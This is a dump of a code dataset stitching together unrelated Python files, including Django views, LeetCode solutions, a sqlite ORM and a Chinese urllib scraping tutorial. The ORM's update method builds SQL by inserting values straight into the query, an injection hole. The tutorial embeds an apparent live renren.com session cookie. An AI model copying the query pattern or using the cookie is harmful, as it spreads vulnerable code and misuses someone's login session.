MANAGE_RATING_MANAGER_MEMBER = auto()\n MANAGE_SUPER_MANAGER_MEMBER = auto()\n MANAGE_SYSTEM_MANAGER_MEMBER = auto()\n CREATE_RATING_MANAGER = auto()\n MANAGE_RATING_MANAGER = auto()\n TRANSFER_GROUP = auto()\n AUDIT = auto()\n CONFIGURE_APPROVAL_PROCESS = auto()\n CONFIGURE_MANAGER = auto()\n MANAGE_SYSTEM_SETTING = auto()\n MANAGE_GLOBAL_SETTING = auto()\n MANAGE_ORGANIZATION = auto()\n MANAGE_COMMON_ACTION = auto()\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Template Constants\n# ---------------------------------------------------------------------------------------------- #\nclass TemplatePreUpdateStatus(ChoicesEnum, LowerStrEnum):\n WAITING = auto()\n RUNNING = auto()\n FINISHED = auto()\n\n _choices_labels = skip(((RUNNING, \"运行中\"), (WAITING, \"等待中\")))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Application & Approval Constants\n# ---------------------------------------------------------------------------------------------- #\nclass ApplicationTypeEnum(ChoicesEnum, LowerStrEnum):\n GRANT_ACTION = auto()\n RENEW_ACTION = auto()\n JOIN_GROUP = auto()\n RENEW_GROUP = auto()\n JOIN_RATING_MANAGER = auto()\n CREATE_RATING_MANAGER = auto()\n UPDATE_RATING_MANAGER = auto()\n\n _choices_labels = skip(\n (\n (GRANT_ACTION, \"自定义权限申请\"),\n (RENEW_ACTION, \"自定义权限续期\"),\n (JOIN_GROUP, \"加入用户组\"),\n (RENEW_GROUP, \"用户组续期\"),\n (JOIN_RATING_MANAGER, \"加入分级管理员\"),\n (CREATE_RATING_MANAGER, \"创建分级管理员\"),\n (UPDATE_RATING_MANAGER, \"修改分级管理员\"),\n )\n )\n\n\n# IAM支持的审批流程节点类型\nclass ProcessorNodeTypeEnum(LowerStrEnum):\n SUPER_MANAGER = auto()\n SYSTEM_MANAGER = auto()\n RATING_MANAGER = auto()\n INSTANCE_APPROVER = auto()\n\n\n# 每一种申请单据,对应的审批流程节点可以支持的ROLE\nAPPLICATION_SUPPORT_PROCESSOR_ROLE_MAP = {\n ApplicationTypeEnum.GRANT_ACTION.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.SYSTEM_MANAGER.value,\n ProcessorNodeTypeEnum.INSTANCE_APPROVER.value,\n ),\n ApplicationTypeEnum.JOIN_GROUP.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ),\n ApplicationTypeEnum.JOIN_RATING_MANAGER.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ),\n ApplicationTypeEnum.CREATE_RATING_MANAGER.value: (ProcessorNodeTypeEnum.SUPER_MANAGER.value,),\n ApplicationTypeEnum.UPDATE_RATING_MANAGER.value: (ProcessorNodeTypeEnum.SUPER_MANAGER.value,),\n}\n\n\nclass ProcessorSourceEnum(ChoicesEnum, StrEnum):\n \"\"\"审批流程节点里的处理者来源\"\"\"\n\n IAM = auto()\n OTHER = auto()\n\n\n# 对于IAM来源的处理者,IAM有固定支持的处理者类型\nIAM_SUPPORT_PROCESSOR_TYPES = [\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.SYSTEM_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ProcessorNodeTypeEnum.INSTANCE_APPROVER.value,\n]\n\n\n# 支持配置默认流程的申请审批类型\nDEFAULT_PROCESS_SUPPORT_APPLICATION_TYPES = [\n ApplicationTypeEnum.GRANT_ACTION.value,\n ApplicationTypeEnum.JOIN_GROUP.value,\n ApplicationTypeEnum.CREATE_RATING_MANAGER.value,\n]\n\n\nclass ApplicationStatus(ChoicesEnum, LowerStrEnum):\n \"\"\"申请单状态\"\"\"\n\n PENDING = auto()\n PASS = auto()\n REJECT = auto()\n CANCELLED = auto()\n\n _choices_labels = skip(((PENDING, _(\"审批中\")), (PASS, _(\"通过\")), (REJECT, _(\"拒绝\")), (CANCELLED, 
_(\"已取消\"))))\n","sub_path":"saas/backend/service/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"226001961","text":"class Solution(object):\n def numTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = [0] * (n+1)\n dp[0] = 1\n for i in range(1,n+1):\n dp[i] = sum([dp[x]*dp[i-1-x] for x in range(i)])\n return dp[-1]","sub_path":"Python/leetcode.096.unique-binary-search-trees.py","file_name":"leetcode.096.unique-binary-search-trees.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"32562855","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 13 16:38:07 2018\r\n\r\n@author: 94\r\n\"\"\"\r\n\r\nimport speech_recognition as sr\r\nr = sr.Recognizer()\r\nmic = sr.Microphone()\r\nprint(sr.Microphone.list_microphone_names())\r\nprint(\"say something\")\r\nwith mic as source:\r\n audio = r.listen(source)\r\n\r\nprint(\"stop saying\")\r\nrecorded_string=r.recognize_google(audio)\r\nprint(\"recorded string: \"+recorded_string)\r\n#i=0\r\n#while i < len(recorded_string):\r\n# print(recorded_string[i])\r\n# if (recorded_string[i]=='x'):\r\n# print(\"this is it\")\r\n# i+=1\r\n\r\n# removing spaces\r\nnew=recorded_string.replace(\"time\",\"x\").replace(\"times\",\"x\").replace(\"bar\",\"x\").replace(\"part\",\"x\").replace(\"baar\",\"x\").replace(\" \",\"\")\r\n\r\nprint(\"processed string: \"+new)\r\n\r\n\r\n\r\n#processing the x/times\r\n#condition (1) the string must contain only numbers and x\r\n#condition (2) x should not be in the beginning or end\r\ni=0\r\nx=0\r\nnewlist1=list(new)\r\nnewlist2=[]\r\nwhile i < (len(newlist1)):\r\n x=0\r\n if ((newlist1[i]=='x')|(newlist1[i]=='X')):\r\n frequency=int(newlist1[i-1])\r\n newlist2[len(newlist2)-1]=newlist1[i+1]\r\n while x < (frequency-2):\r\n newlist2.append(newlist1[i+1])\r\n x+=1\r\n else:\r\n newlist2.append(newlist1[i])\r\n i+=1\r\nprint(\"Final number :{}\".format(\"\".join(newlist2)))\r\n\r\nprint(\"done till here\")","sub_path":"working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"422894556","text":"# -*- coding: utf8 -*-\nimport os\nimport json\nimport time\nfrom pytube import YouTube\n\ncurdirpath = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(curdirpath, 'highlight-summer.json')) as data:\n videos = json.load(data)\n for key in videos.keys():\n outputdirpath = os.path.join(curdirpath, 'raw_files', 'highlight')\n if not os.path.exists(outputdirpath):\n os.makedirs(outputdirpath)\n filepath = os.path.join(outputdirpath, '{}.webm'.format(key))\n if os.path.exists(filepath):\n continue\n print('try to download: {}, {}'.format(key, videos[key]))\n YouTube(videos[key]).streams\\\n .filter(adaptive=True, only_video=True)\\\n .order_by('resolution').desc().first()\\\n .download(output_path=outputdirpath, filename=key)\n","sub_path":"videos/highlight_downloader.py","file_name":"highlight_downloader.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"601952595","text":"__author__ = 'yinjun'\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # 
@param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n\n h = ListNode(0)\n h.next = head\n\n c = h\n a = h.next\n\n if a == None or a.next == None:\n return h.next\n\n b = a.next\n\n while b != None:\n\n find = a.val == b.val\n while b!=None and a.val == b.val:\n b = b.next\n if find:\n c.next = b\n a = b\n\n if b!=None:\n b = b.next\n else:\n c = a\n a = a.next\n b = a.next\n\n return h.next\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None","sub_path":"LeetCode/python/061-090/082-remove-duplicates-from-sorted-list-ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"395760302","text":"import logging\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext_lazy as _\nfrom .models import Organization, UserProfile\nfrom .member_forms import MemberSignupForm\nfrom django.conf import settings\nfrom django.utils.safestring import mark_safe\n\n\n# Copyright Videntity Systems Inc.\n\nlogger = logging.getLogger('verifymyidentity_.%s' % __name__)\n\n\ndef find_org_to_create_member_account(request):\n \"\"\"When the user posts the find_org_to_create_account form, redirect to that page\"\"\"\n if request.method != 'POST' or not request.POST.get('organization_slug'):\n return HttpResponseRedirect(reverse('home'))\n else:\n org_slug = request.POST.get('organization_slug')\n return HttpResponseRedirect(reverse('create_member_account', args=[org_slug]))\n\n\ndef create_member_account(request, organization_slug,\n service_title=settings.APPLICATION_TITLE):\n org = get_object_or_404(Organization, slug=organization_slug)\n name = _(\"Member Signup via %s\") % (org.name)\n if request.method == 'POST':\n form = MemberSignupForm(request.POST, request.FILES)\n if form.is_valid():\n user = form.save()\n up = UserProfile.objects.get(user=user)\n messages.success(request, _(\"\"\"Welcome %s %s.\n Your account %s was created with\n the username %s\"\"\" % (user.first_name, user.last_name,\n up.subject, user.username)))\n\n if user.is_active:\n messages.success(request, _(\n \"Your account is active and you may log in.\"))\n else:\n messages.error(request, _(\n \"Your account is not active so you may not log in at this time.\"))\n\n messages.warning(request, _(\n \"\"\"Someone at %s needs to activate your account.\"\"\" % (org.name, )))\n\n if user.email:\n messages.info(request, _(\n \"Check your email to confirm your email address.\"))\n else:\n messages.warning(request, _(\"\"\"You did not supply an email.\n For your security, please consider\n adding an email to this account.\"\"\"))\n\n if up.mobile_phone_number:\n messages.info(request, _(\n \"Thanks for providing a mobile phone number. 
A welcome message is on the way.\"))\n            else:\n                messages.warning(request, _(\"\"\"You did not supply a mobile phone number.\n                    So we may contact you, please consider\n                    adding a mobile phone number to this account.\"\"\"))\n\n            msg = _(\"\"\"As a reminder, you created this\n                account to gain access to %s (%s).\"\"\" % (settings.KILLER_APP_URI,\n                          settings.KILLER_APP_TITLE))\n\n            messages.info(request, _(mark_safe(msg)))\n\n            # Notify Org member to approve ID.\n\n            return HttpResponseRedirect(reverse('home'))\n        else:\n            # return the bound form with errors\n            messages.error(request, _(\"The form contained errors.\"))\n            return render(request,\n                          'generic/bootstrapform.html',\n                          {'name': name, 'form': form,\n                           'org_slug': org.slug,\n                           'domain': org.domain,\n                           'service_title': service_title})\n    else:\n        # this is an HTTP GET\n        # Adding ability to pre-fill invitation_code and email\n        # via GET parameters\n        form_data = {\n            'invitation_code': request.GET.get('invitation_code', ''),\n            'email': request.GET.get('email', ''),\n            'first_name': request.GET.get('first_name', ''),\n            'last_name': request.GET.get('last_name', ''),\n            'nickname': request.GET.get('nickname', ''),\n            'sex': request.GET.get('sex', ''),\n            'gender': request.GET.get('gender', ''),\n            'phone_number': request.GET.get('phone_number', ''),\n            'org_slug': org.slug}\n        return render(request, 'generic/bootstrapform.html',\n                      {'name': name, 'form':\n                       MemberSignupForm(initial=form_data),\n                       'service_title': service_title})\n","sub_path":"apps/accounts/member_views.py","file_name":"member_views.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"395056773","text":"n = int(input())\n\ndict = {}\n\nfor i in range(n):\n    temp = input()\n    length = len(temp)\n    dict[temp] = length\n\nresult = []\n\nfor k,v in dict.items():\n    result.append([k,v])\n\nresult.sort()\nresult.sort(key = lambda x : x[1])\n\nfor elem in result:\n    print(elem[0])","sub_path":"sourcecode/1181_2.py","file_name":"1181_2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"103514290","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n    def __init__(self, val, left, right):\n        self.val = val\n        self.left = left\n        self.right = right\n\"\"\"\nclass Solution(object):\n    def treeToDoublyList(self, root):\n        \"\"\"\n        :type root: Node\n        :rtype: Node\n        \"\"\"\n        def helper(root):\n            if not root.left and not root.right:\n                return root, root\n            if root.left:\n                lh, lt = helper(root.left)\n                lt.right = root\n                root.left = lt\n            else:\n                lh = root\n            if root.right:\n                rh, rt = helper(root.right)\n                rh.left = root\n                root.right = rh\n            else:\n                rt = root\n            return lh, rt\n        if not root:\n            return root\n        h, t = helper(root)\n        h.left, t.right = t, h\n        return h\n","sub_path":"426_ConvertBinarySearchTreetoSortedDoublyLinkedList_M.py","file_name":"426_ConvertBinarySearchTreetoSortedDoublyLinkedList_M.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"319782021","text":"\"\"\"An ORM implementation backed by sqlite3\"\"\"\nimport sqlite3\nimport inspect\n\nSQLITE_TYPE_MAP = {\n    int: \"INTEGER\",\n    float: \"REAL\",\n    str: \"TEXT\",\n    bool: \"INTEGER\",  # 0 or 1\n}\nCREATE_TABLE_SQL = \"CREATE TABLE {name} ({fields});\"\nINSERT_SQL = \"INSERT INTO {name} ({fields}) VALUES ({placeholders});\"\nSELECT_ALL_SQL = \"SELECT * FROM {name};\"\nSELECT_WHERE_SQL = 
\"SELECT * FROM {name} WHERE id=?;\"\nUPDATE_SQL = \"UPDATE {table_name} SET {query} WHERE id=?;\"\nDELETE_SQL = \"DELETE FROM {name} WHERE id=?\"\n\n\nclass Database:\n \"\"\"Класс, поддерживающий основные (CRUD) операции с БД\"\"\"\n def __init__(self, path):\n \"\"\"Инициализация соединения с БД\n\n Keyword arguments:\n path -- путь к БД\n \"\"\"\n self.conn = sqlite3.connect(path)\n\n def _execute(self, sql, params=None):\n \"\"\"Внутренний метод исполнения sql запроса\n\n Keyword arguments:\n sql -- SQL запрос (возможно, в нём будут '?')\n params -- параметры, замещающие '?' в sql\n \"\"\"\n if params:\n self.conn.execute(sql, params)\n else:\n self.conn.execute(sql)\n\n def create(self, table):\n \"\"\"Метод создания таблицы\n\n Keyword arguments:\n table -- класс-таблица\n \"\"\"\n self._execute(table.get_create_sql())\n\n def add(self, instance):\n \"\"\"Метод вставки объекта-строки таблицы в БД\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n\n Exceptions:\n ValueError - если объект уже занесён в БД\n \"\"\"\n if instance.record_id is not None:\n raise ValueError(\"Этот объект уже занесён в БД\")\n sql, values = instance.get_insert_sql()\n self._execute(sql, values)\n instance.__class__.size_inc()\n instance.record_id = instance.__class__.size()\n self.conn.commit()\n\n def all(self, table):\n \"\"\"Запрос на вывод содержимого таблицы\n\n Keyword arguments:\n table -- класс-таблица\n\n Returns:\n содержимое таблицы в виде списка кортежей\n \"\"\"\n result = []\n sql = table.get_select_all_sql()\n for row in self.conn.execute(sql):\n result.append(row)\n return result\n\n def get(self, table, record_id):\n \"\"\"Запрос на вывод содержимого таблицы по id\n\n Keyword arguments:\n table -- класс-таблица\n record_id -- id записи в таблице table\n\n Returns:\n содержимое таблицы по id=record_id\n \"\"\"\n result = []\n sql = table.get_select_where_sql()\n params = (str(record_id),)\n for row in self.conn.execute(sql, params):\n result.append(row)\n return result\n\n def update(self, instance):\n \"\"\"Запрос на обновление строки таблицы, соответствующей instance\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n \"\"\"\n sql = instance.get_update_sql()\n self._execute(sql, (str(instance.record_id),))\n self.conn.commit()\n\n def delete(self, instance):\n \"\"\"Запрос на удаление строки таблицы, соответствующей instance\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n \"\"\"\n sql = instance.get_delete_sql()\n self._execute(sql, (str(instance.record_id),))\n instance.record_id = None\n self.conn.commit()\n\n def __del__(self):\n \"\"\"Закрытие соединения с БД\"\"\"\n self.conn.close()\n\n\nclass Table:\n \"\"\"Класс для работы с конкретной таблицей БД\"\"\"\n _size = 0\n\n def __init__(self, **kwargs):\n \"\"\"Инициализация объекта-строки\n\n Keyword arguments:\n kwargs -- значения в колонке таблицы\n\n Exceptions:\n ValueError - в таблице нет одной из указанных колонок\n \"\"\"\n self.record_id = None\n for name, value in kwargs.items():\n if name in self.__class__.__dict__:\n self.__dict__[name] = value\n else:\n raise ValueError(\"В таблице нет такой колонки\")\n\n @property\n def record_id(self):\n \"\"\"Getter record_id\"\"\"\n return self._id\n\n @record_id.setter\n def record_id(self, new_id):\n \"\"\"Setter record_id\"\"\"\n self._id = new_id\n\n @classmethod\n def size(cls):\n \"\"\"\n Returns:\n Текущий размер таблицы (номер последнего id в ней)\n \"\"\"\n return cls._size\n\n 
@classmethod\n    def size_inc(cls):\n        \"\"\"Increment the stored table size\"\"\"\n        cls._size += 1\n\n    @classmethod\n    def set_size(cls, new_size):\n        \"\"\"Set the current table size\n        (needed for operations on a pre-existing table)\n\n        Keyword arguments:\n        new_size -- the new table size\n        \"\"\"\n        cls._size = new_size\n\n    @classmethod\n    def size_zeroing(cls):\n        \"\"\"Reset the table element count to zero (needed for testing)\"\"\"\n        cls._size = 0\n\n    @classmethod\n    def get_name(cls):\n        \"\"\"\n        Returns:\n            the name of the table in the DB\n        \"\"\"\n        return cls.__name__.lower()\n\n    @classmethod\n    def get_create_sql(cls):\n        \"\"\"Build the CREATE TABLE query for the table\n\n        Returns:\n            The generated query\n        \"\"\"\n        fields = [\n            (\"id\", \"INTEGER PRIMARY KEY AUTOINCREMENT\")\n        ]\n        for name, field in inspect.getmembers(cls):\n            if isinstance(field, Column):\n                fields.append((name, field.sql_type))\n        fields = [\" \".join(x) for x in fields]\n        return CREATE_TABLE_SQL.format(name=cls.get_name(),\n                                       fields=\", \".join(fields))\n\n    def get_insert_sql(self):\n        \"\"\"Build the query for inserting a row into the table\n\n        Returns:\n            A tuple of the query with '?' placeholders and the values themselves\n        \"\"\"\n        cls = self.__class__\n        fields = []\n        placeholders = []\n        values = []\n        for name, field in inspect.getmembers(cls):\n            if isinstance(field, Column):\n                if isinstance(getattr(self, name), Column):\n                    raise ValueError(\"No value set for the column\")\n                fields.append(name)\n                values.append(getattr(self, name))\n                placeholders.append('?')\n        sql = INSERT_SQL.format(name=cls.get_name(),\n                                fields=\", \".join(fields),\n                                placeholders=\", \".join(placeholders))\n        return sql, values\n\n    @classmethod\n    def get_select_all_sql(cls):\n        \"\"\"\n        Returns:\n            The query selecting the full contents of the table\n        \"\"\"\n        sql = SELECT_ALL_SQL.format(name=cls.get_name())\n        return sql\n\n    @classmethod\n    def get_select_where_sql(cls):\n        \"\"\"\n        Returns:\n            The query selecting a table row by id, with '?' in place of the id\n        \"\"\"\n        sql = SELECT_WHERE_SQL.format(name=cls.get_name())\n        return sql\n\n    def get_update_sql(self):\n        \"\"\"Build the query for updating a row in the table\n\n        Returns:\n            An UPDATE query with '?' in place of the id\n        \"\"\"\n        cls = self.__class__\n        query = []\n        for name, field in inspect.getmembers(cls):\n            if isinstance(field, Column):\n                if isinstance(getattr(self, name), Column):\n                    raise ValueError(\"No value set for the column\")\n                val = getattr(self, name)\n                if isinstance(getattr(self, name), str):\n                    query.append(\"{name}='{val}'\".format(name=name, val=val))\n                else:\n                    query.append(\"{name}={val}\".format(name=name, val=val))\n        sql = UPDATE_SQL.format(table_name=self.get_name(),\n                                query=\", \".join(query))\n        return sql\n\n    def get_delete_sql(self):\n        \"\"\"\n        Returns:\n            The query deleting a table row by id, with '?' in place of the id\n        \"\"\"\n        return DELETE_SQL.format(name=self.get_name())\n\n\nclass Column:\n    \"\"\"A class for mapping python types to SQL types\"\"\"\n    def __init__(self, column_type):\n        \"\"\"Initialize a table-column type object\n\n        Keyword arguments:\n        column_type -- one of the classes int, float, str, bool\n        
\"\"\"\n        self._type = column_type\n\n    @property\n    def sql_type(self):\n        \"\"\"Getter for the SQL type defined by this object\"\"\"\n        return SQLITE_TYPE_MAP[self._type]\n\n\nif __name__ == '__main__':\n    pass\n","sub_path":"HW_3/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"267330849","text":"from settings import *\nimport os\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nMIDDLEWARE.append('middleware.dev_cors_middleware')\n\nif os.environ.get('POSTGRES', False):\n    DATABASES = {\n        'default': {\n            'ENGINE': 'django.db.backends.postgresql',\n            'NAME': 'bias',\n            'USER': 'postgres',\n            'PASSWORD': 'mysecretpassword',\n            'HOST': '127.0.0.1',\n            'PORT': '5432',\n        }\n    }\n\n\nCACHES = {\n    'default': {\n        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n    }\n}\n","sub_path":"server/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"625254847","text":"# -*- coding:utf-8 -*-\n# @Desc : \n# @Author : Administrator\n# @Date : 2019-07-17 14:24\n\n# Python2: urllib2, urllib\n# Python3: urllib2 and urllib were merged into urllib.request\n\n# encode() : string --> bytes\n# decode() : bytes --> string\n\nimport urllib.request\nimport urllib.parse\n\n### Common methods of the urllib.request module:\n## response = urllib.request.urlopen(url) # GET request; query parameters appear in the URL\n# Parameter: url is the address to request\n# Purpose: send a request to the site and fetch the response\n# Return value: an http.client.HTTPResponse object, which behaves like a file handle\n## urllib.request.Request(url,data=data,headers=headers) # build a POST request object req\n# Note: the form data must be submitted as bytes, not str\n# Converting form data to bytes:\n# 1. define the form data as a dict: data = {key:value}\n# 2. encode the dict-form data: data = urllib.parse.urlencode(data)\n# 3. convert the encoded form data to bytes: data = bytes(data)\n\n\n## urllib.request.Request(url,data=data,headers=headers) # add a User-Agent request header, stored as a dict in headers\n# Example:\n# url = \"http://www.baidu.com/\"\n# headers = {\n#     \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\n# }\n# 1. create the request object (including User-Agent)\n# req = urllib.request.Request(url,headers=headers)\n# 2. get the response object\n# response = urllib.request.urlopen(req)\n# 3. read the response data\n# data_str = res.read().decode(\"utf-8\")\n\n\n## urllib.request.ProxyHandler() # set an IP proxy\n# 1. use ProxyHandler with the proxy IP to build a handler\nhandler = urllib.request.ProxyHandler({\"https\":\"112.87.71.209:9999\"})\n# 2. build an opener from the handler just created\nopener = urllib.request.build_opener(handler)\n# if a request header (User-Agent) is needed, use the Request class\n# req = request.Request(url,headers)\n# response = opener.open(req)\n# 3. use the opener to send a request with open()\nresponse = opener.open(\"http://www.baidu.com\")\n\n# Handler types:\n# HTTPHandler() # no special functionality\n# ProxyHandler({\"protocol\":\"IP:port\"}) # plain proxy\n# ProxyBasicAuthHandler(password manager object) # authenticated private proxy\n# HTTPBasicAuthHandler(password manager object) # web client authentication\n\n\n## urllib.request.Request(url,data=data,headers=headers) # add cookie info to simulate a login, stored as a dict in headers\nlogin_before = \"http://www.renren.com/SysHome.do\" # renren.com login page\nlogin_after = \"http://www.renren.com/893394172/profile\" # renren.com profile page after login\nheaders = {\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n    \"Cookie\":\"anonymid=jtpd8l73-kbnu9w; depovince=GW; _r01_=1; JSESSIONID=abcKxe6-uz3U-fd0nK4Mw; ick_login=17af5e13-8091-4915-b704-ba0dd553a56c; ick=2cebb1a8-320f-409f-b97c-d7689da8ea12; 
first_login_flag=1; ln_uact=18103763930; ln_hurl=http://head.xiaonei.com/photos/0/0/men_main.gif; jebe_key=09416abf-1d11-4c6c-8467-da91b972e2bc%7C5b34e73601acb25887c4068b9cf69955%7C1553579872178%7C1%7C1553579871820; jebecookies=b17c717a-60d0-41e2-b6e1-8d14325adb62|||||; _de=3F1C6150E59B993580B4C5FE015D8D28; p=a31aab50cb8d58a4f779dfd1cf9c348c2; t=1da5424772e1107fe8c4e9fc60151a562; societyguester=1da5424772e1107fe8c4e9fc60151a562; id=893394172; xnsid=475dd7b9; loginfrom=syshome; wp_fold=0\"\n}\nreq = urllib.request.Request(url=login_after, headers=headers)\nresponse = urllib.request.urlopen(req)\n\n\n## urlretrieve() # save the response data of a request to a local file\n# signature: def urlretrieve(url, filename=None, reporthook=None, data=None)\nresult = urllib.request.urlretrieve(\"http://www.baidu.com\",'baidu.txt')\n\n\n### Methods of http.client.HTTPResponse (the response object):\n# read() # read all response data, as bytes\n# read().decode('utf-8')) # read all response data, as a string\n# readline() # read one line of the response, as bytes\n# readlines() # read multiple lines of the response, as a list of bytes\n# getcode() # get the response status code\n# geturl() # return the actual URL, useful after redirects\n\n\n\n\n\n\n\n### Managing cookies with the http.cookiejar module to simulate a login\n# The main classes of http.cookiejar are: CookieJar, FileCookieJar, MozillaCoookieJar, LWPCookieJar\nfrom http.cookiejar import CookieJar\n# 1. create a CookieJar object\ncookiejar = CookieJar()\n# 2. create an HTTPCookieProcessor from the CookieJar object\nhandler = urllib.request.HTTPCookieProcessor(cookiejar)\n# 3. build an opener from the handler above\nopener = urllib.request.build_opener(handler)\n# 4. use the opener to send the login request (renren.com account and password)\nheaders = {\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\"\n}\ndata = {\n    \"email\": \"1810376****\",\n    \"password\": \"****123456\"\n}\nlogin_before = \"http://www.renren.com/PLogin.do\" # renren.com login page\nreq = urllib.request.Request(url=login_before, data=urllib.parse.urlencode(data).encode(\"utf-8\"), headers=headers)\nresponse = opener.open(req)\n# after a successful login, visit the profile page\n# when fetching the profile page, reuse the opener created above instead of building a new one,\n# because it already carries the cookies required for the login\nlogin_after = \"http://www.renren.com/893394172/profile\" # renren.com profile page after login\nreq2 = urllib.request.Request(url=login_after, headers=headers)\nresponse = opener.open(req2)\n\n\n\n### Saving and loading cookie data\nfrom http.cookiejar import MozillaCookieJar\nmozillacookiejar = MozillaCookieJar(\"cookie.txt\")\nhandler = urllib.request.HTTPCookieProcessor(mozillacookiejar)\nopener = urllib.request.build_opener(handler)\n## save\nopener.open(\"http://httpbin.org/cookies/set?user=zhangsan\")\nmozillacookiejar.save(ignore_discard=True)\n## load\nmozillacookiejar.load(ignore_discard=True)\nopener.open(\"http://httpbin.org/cookies\")\nfor cookie in mozillacookiejar:\n    print(cookie)","sub_path":"[14]Python-网络爬虫部分/02urllib库-request模块.py","file_name":"02urllib库-request模块.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"442678134","text":"\n\nfrom xai.brain.wordbase.verbs._infringe import _INFRINGE\n\n# class header\nclass _INFRINGED(_INFRINGE, ):\n\tdef __init__(self,): \n\t\t_INFRINGE.__init__(self)\n\t\tself.name = \"INFRINGED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"infringe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_infringed.py","file_name":"_infringed.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"124691027","text":"\n\nfrom xai.brain.wordbase.verbs._proselyte import _PROSELYTE\n\n# class header\nclass _PROSELYTES(_PROSELYTE, 
):\n\tdef __init__(self,): \n\t\t_PROSELYTE.__init__(self)\n\t\tself.name = \"PROSELYTES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"proselyte\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_proselytes.py","file_name":"_proselytes.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"19086203","text":"# WallBuilder.py\n# Handles the building of Wall objects passed from LevelBuilder\n\n# Imports\nfrom Wall import *\n\nclass WallBuilder(object):\n 'Handles the building of Wall objects passed from LevelBuilder'\n\n # WallBuilder(self, row, col)\n # Starts a wall with the leftmost position at (row, col)\n def __init__(self, row, col, ppm):\n print(\"WallBuilder created.\")\n \n # Debug info\n self.DEBUG=0\n self.DEBUG_TAG=\"[WallBuilder]\"\n\n # PPM\n self.ppm=ppm\n\n # Variables\n self.x_start=row\n self.y_start=col\n self.active_check=0\n self.x_span=0\n self.y_span=0\n self.line_type=\"\"\n \n # Storage\n self.wall_storage=[]\n\n # Functions\n # active(self)\n # Checks to see if the WallBuilder has been initialized\n def activeBuild(self):\n if (self.active_check == 1):\n return 1\n else:\n return 0\n\n # activateBuilder(self)\n # Activates the WallBuilder; informs us that a Wall has begun construction\n def activateBuilder(self):\n \n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":activateBuilder\")\n \n # WB now active\n self.active_check=1\n self.x_span=1\n self.y_span=1\n\n # resetBuilder(self)\n # Returns the WallBuilder to default setup for next Wall\n def resetBuilder(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":resetBuilder\")\n self.active_check=0\n self.x_span=0\n self.y_span=0 \n 